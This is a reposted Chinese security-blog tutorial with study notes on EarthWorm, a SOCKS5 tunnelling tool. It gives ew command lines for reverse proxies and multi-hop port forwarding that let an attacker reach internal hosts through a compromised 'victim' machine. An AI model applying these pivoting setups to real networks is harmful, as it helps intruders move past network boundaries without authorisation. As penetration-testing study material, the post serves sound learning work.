内网穿透神器EW-学习笔记

admin 2021年11月30日09:19:42安全文章评论62 views726字阅读2分25秒阅读模式

0x00简介:

    EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

http://rootkiter.com/EarthWorm/


https://github.com/idlefire/ew

 

0x01:解读

一、普通网络环境

内网穿透神器EW-学习笔记

解析:

外网受害者主机执行 ./ew -s ssocksd -l 8888 攻击主机 通过 代理工具 代理端口 1.1.1.1:8888访问受害主机

内网穿透神器EW-学习笔记

解析:

受害者可访问外网主机(1.1.1.1) 执行 ./ew -s rcsocks -l 1080 -e 8888注:是将受害者可访问外网主机的8888端口流量转发到受害者可访问外网主机1080端口上
在内网2.2.2.2 主机中执行./ew -s rcsocks -d 1.1.1.1 -e 8888攻击者通过访问 1.1.1.1:1080 直接访问到 2.2.2.2

二、二重网络环境

内网穿透神器EW-学习笔记

 解析:

在内网主机B中执行./ew -s rcsocks -l 9999 在web 主机中执行./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 在攻击机器中代理 2.2.2.2:1080 来访问 2.2.2.3的机器

内网穿透神器EW-学习笔记

 

在web 服务器中执行 ./ew -s lcx_listen -l 1080 -e 8888 在主机B中执行 ./ew -s sscocksd -l 9999 在主机A中执行 ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 在攻击主机中代理1.1.1.1:1080 就可以访问2.2.2.3 主机

文章内容源自:https://github.com/idlefire/ew

内网穿透神器EW-学习笔记

本文始发于微信公众号(洛米唯熊):内网穿透神器EW-学习笔记

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月30日09:19:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  内网穿透神器EW-学习笔记 http://cn-sec.com/archives/497127.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: